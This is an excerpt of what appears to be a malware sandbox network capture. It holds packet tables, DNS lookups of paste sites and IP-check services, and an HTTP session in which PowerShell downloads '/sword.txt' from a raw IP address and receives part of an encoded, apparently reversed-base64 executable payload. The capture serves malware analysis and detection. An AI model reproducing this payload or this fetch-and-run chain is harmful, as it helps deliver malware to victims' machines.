          Jun 14, 2024 15:15:19.493886948 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493913889 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493927002 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.493927002 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.493933916 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493961096 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.494755983 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.494780064 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.494802952 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.494815111 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.494818926 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.495037079 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.495043993 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.495223999 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.495570898 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.495611906 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.495640039 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.495663881 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.495711088 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.495718956 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.496217012 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.496241093 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.496262074 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.496263027 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.496279955 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.496465921 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.496493101 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.496500015 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.497397900 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.497404099 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.498523951 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.498658895 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.498802900 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.499361038 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.499557018 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.499607086 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.499607086 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.499607086 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.499624014 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.502662897 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.503205061 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.504028082 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.504081964 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.504081964 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.504081964 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.504098892 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.504159927 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.504262924 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.504262924 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.504270077 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.508536100 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.508564949 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.508609056 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.508645058 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.508677959 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.508709908 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.508733988 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.508734941 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.508734941 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.508734941 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.508743048 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.512274027 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.512274027 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.537687063 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.540263891 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.609180927 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.609256029 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.609579086 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.609632015 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.609632015 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.609632015 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.609644890 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.611305952 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.611354113 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.611407042 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.611805916 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.611860037 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.611860037 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.611860037 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.611860037 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.611860037 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.611867905 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.612262011 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.619410038 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.619550943 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.620191097 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.620204926 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.620516062 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.626544952 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.626583099 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.626878977 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.627029896 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.627074957 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.627074957 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.627074957 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.627074957 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.627089024 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.627321959 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.627625942 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.627662897 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.627701998 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.628266096 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628266096 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628266096 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628266096 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628279924 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.628607035 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.628640890 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.628720045 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.628880978 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.628914118 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.628926992 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628926992 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628926992 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628926992 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628926992 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.628936052 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.629064083 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.629353046 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.629406929 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.629494905 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.629534960 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.629568100 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.629568100 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.629575014 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.629708052 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.677370071 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.677380085 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.724261999 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.725050926 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.725060940 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.725100994 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.725119114 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.725176096 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.725176096 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.725336075 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.725343943 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.725373030 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.725384951 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.725450039 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.725450039 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.727267027 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727276087 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727313995 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727344990 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727390051 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.727390051 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.727413893 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727581978 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727612019 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727626085 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727668047 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.727668047 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.727668047 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.727677107 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.727865934 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.728446960 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.728465080 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.730087996 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.730109930 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.732283115 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.732283115 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.732296944 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.735433102 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.735476017 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.735562086 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.735615969 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.735615969 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.735615969 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.735624075 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.750659943 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.750720024 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.750741959 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.750761986 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.751787901 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.751852036 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.751852036 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.751859903 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.751888037 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.752266884 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.755031109 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:23.836045980 CEST5430480192.168.2.8104.16.185.241
          Jun 14, 2024 15:15:23.841216087 CEST8054304104.16.185.241192.168.2.8
          Jun 14, 2024 15:15:23.841310978 CEST5430480192.168.2.8104.16.185.241
          Jun 14, 2024 15:15:23.841526985 CEST5430480192.168.2.8104.16.185.241
          Jun 14, 2024 15:15:23.846345901 CEST8054304104.16.185.241192.168.2.8
          Jun 14, 2024 15:15:25.230618000 CEST8054304104.16.185.241192.168.2.8
          Jun 14, 2024 15:15:25.230986118 CEST8054304104.16.185.241192.168.2.8
          Jun 14, 2024 15:15:25.231041908 CEST5430480192.168.2.8104.16.185.241
          Jun 14, 2024 15:15:25.231199026 CEST8054304104.16.185.241192.168.2.8
          Jun 14, 2024 15:15:25.231231928 CEST5430480192.168.2.8104.16.185.241
          Jun 14, 2024 15:15:26.238965988 CEST5430480192.168.2.8104.16.185.241
          Jun 14, 2024 15:15:26.244424105 CEST8054304104.16.185.241192.168.2.8
          Jun 14, 2024 15:15:26.244488955 CEST5430480192.168.2.8104.16.185.241
          Jun 14, 2024 15:15:26.250313997 CEST5430580192.168.2.8208.95.112.1
          Jun 14, 2024 15:15:26.255223036 CEST8054305208.95.112.1192.168.2.8
          Jun 14, 2024 15:15:26.255295038 CEST5430580192.168.2.8208.95.112.1
          Jun 14, 2024 15:15:26.255616903 CEST5430580192.168.2.8208.95.112.1
          Jun 14, 2024 15:15:26.260468006 CEST8054305208.95.112.1192.168.2.8
          Jun 14, 2024 15:15:26.848088980 CEST8054305208.95.112.1192.168.2.8
          Jun 14, 2024 15:15:26.944677114 CEST5430580192.168.2.8208.95.112.1
          Jun 14, 2024 15:15:26.946124077 CEST54306443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:26.946163893 CEST44354306188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:26.946311951 CEST54306443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:26.950223923 CEST8054305208.95.112.1192.168.2.8
          Jun 14, 2024 15:15:26.950298071 CEST5430580192.168.2.8208.95.112.1
          Jun 14, 2024 15:15:26.950911045 CEST54306443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:26.950925112 CEST44354306188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:27.557929039 CEST44354306188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:27.558012009 CEST54306443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:27.560188055 CEST54306443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:27.560195923 CEST44354306188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:27.560446978 CEST44354306188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:27.562014103 CEST54306443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:27.562083006 CEST54306443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:27.562127113 CEST44354306188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:28.116264105 CEST44354306188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:28.116446972 CEST44354306188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:28.116560936 CEST54306443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:28.117130995 CEST54306443192.168.2.8188.114.96.3
          TimestampSource PortDest PortSource IPDest IP
          Jun 14, 2024 15:15:00.275892019 CEST6087553192.168.2.81.1.1.1
          Jun 14, 2024 15:15:00.286645889 CEST53608751.1.1.1192.168.2.8
          Jun 14, 2024 15:15:03.947308064 CEST4991953192.168.2.81.1.1.1
          Jun 14, 2024 15:15:03.958914042 CEST53499191.1.1.1192.168.2.8
          Jun 14, 2024 15:15:16.027129889 CEST6151853192.168.2.81.1.1.1
          Jun 14, 2024 15:15:16.045623064 CEST53615181.1.1.1192.168.2.8
          Jun 14, 2024 15:15:20.747736931 CEST53570451.1.1.1192.168.2.8
          Jun 14, 2024 15:15:23.819113970 CEST6495653192.168.2.81.1.1.1
          Jun 14, 2024 15:15:23.827912092 CEST53649561.1.1.1192.168.2.8
          Jun 14, 2024 15:15:25.274831057 CEST6140953192.168.2.81.1.1.1
          Jun 14, 2024 15:15:25.284375906 CEST53614091.1.1.1192.168.2.8
          Jun 14, 2024 15:15:26.240533113 CEST6305953192.168.2.81.1.1.1
          Jun 14, 2024 15:15:26.249100924 CEST53630591.1.1.1192.168.2.8
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jun 14, 2024 15:15:00.275892019 CEST192.168.2.81.1.1.10xf2feStandard query (0)paste.eeA (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:03.947308064 CEST192.168.2.81.1.1.10x3232Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:16.027129889 CEST192.168.2.81.1.1.10xb860Standard query (0)whatismyipaddressnow.coA (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:23.819113970 CEST192.168.2.81.1.1.10x3d6fStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:25.274831057 CEST192.168.2.81.1.1.10xfa1Standard query (0)75.103.13.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
          Jun 14, 2024 15:15:26.240533113 CEST192.168.2.81.1.1.10x8d11Standard query (0)ip-api.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jun 14, 2024 15:15:00.286645889 CEST1.1.1.1192.168.2.80xf2feNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:00.286645889 CEST1.1.1.1192.168.2.80xf2feNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:03.958914042 CEST1.1.1.1192.168.2.80x3232No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:03.958914042 CEST1.1.1.1192.168.2.80x3232No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:16.045623064 CEST1.1.1.1192.168.2.80xb860No error (0)whatismyipaddressnow.co188.114.96.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:16.045623064 CEST1.1.1.1192.168.2.80xb860No error (0)whatismyipaddressnow.co188.114.97.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:23.827912092 CEST1.1.1.1192.168.2.80x3d6fNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:23.827912092 CEST1.1.1.1192.168.2.80x3d6fNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:25.284375906 CEST1.1.1.1192.168.2.80xfa1Name error (3)75.103.13.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
          Jun 14, 2024 15:15:26.249100924 CEST1.1.1.1192.168.2.80x8d11No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
          • paste.ee
          • uploaddeimagens.com.br
          • whatismyipaddressnow.co
          • 93.123.39.71
          • icanhazip.com
          • ip-api.com
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.84970993.123.39.71807908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          TimestampBytes transferredDirectionData
          Jun 14, 2024 15:15:13.835041046 CEST71OUTGET /sword.txt HTTP/1.1
          Host: 93.123.39.71
          Connection: Keep-Alive
          Jun 14, 2024 15:15:15.517054081 CEST1236INHTTP/1.1 200 OK
          Content-Type: text/plain
          Last-Modified: Thu, 13 Jun 2024 19:52:12 GMT
          Accept-Ranges: bytes
          ETag: "743fe92ecbbdda1:0"
          Server: Microsoft-IIS/10.0
          Date: Fri, 14 Jun 2024 13:15:14 GMT
          Content-Length: 75096
          Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
          Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+gPAAAADAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
          Jun 14, 2024 15:15:15.517138004 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 54 65 73 4a 57 62 6c 4e 33 63 68 39 43 50 4b 30 67 50 76 5a 6d 62 4a 52 33 63 31 4a 48 64 76 77 44 49 67 6f 51 44 2b 6b 48 64 70 4a 58 64 6a 56 32 63 76 77 44 49 67 41 43 49 4b 30
          Data Ascii: AAAAAAAAAAAAAAAAAAAAA4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lmcQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3
          Jun 14, 2024 15:15:15.517174006 CEST1236INData Raw: 77 41 67 4d 41 41 43 41 70 43 41 41 41 51 48 41 6f 42 77 5a 41 6b 47 41 79 42 51 65 41 41 48 41 76 42 77 51 41 77 47 41 68 42 77 5a 41 55 47 41 4d 42 51 41 41 49 43 41 6f 42 41 41 41 41 41 41 6c 42 41 65 41 55 47 41 75 41 51 62 41 4d 48 41 70 42
          Data Ascii: wAgMAACApCAAAQHAoBwZAkGAyBQeAAHAvBwQAwGAhBwZAUGAMBQAAICAoBAAAAAAlBAeAUGAuAQbAMHApBgbAQDApBgcAQDA0BQaAwGApBAdAUFAAAQZA0GAhBgTAwGAhBgbAIHAlBAdA4GAJBQAAMBAGBAAAkDA2AgLAcDAyAgLAADAuAANAAAAAAgbA8GApBwcAIHAlBgVAUGAsBQaAYEABAgCAQDAAAAAA0GAzBQaA4GA0AQ
          Jun 14, 2024 15:15:15.517206907 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
          Jun 14, 2024 15:15:15.517245054 CEST1236INData Raw: 42 45 52 45 56 77 51 41 52 45 52 46 46 45 51 45 52 55 68 41 42 45 52 45 56 67 41 43 74 43 6f 45 62 63 51 55 4f 34 51 41 67 51 41 43 4d 55 51 45 42 45 52 45 56 49 67 43 42 45 52 45 56 49 67 42 48 45 42 43 46 30 52 6e 41 4b 52 6d 41 4b 52 6d 41 4b
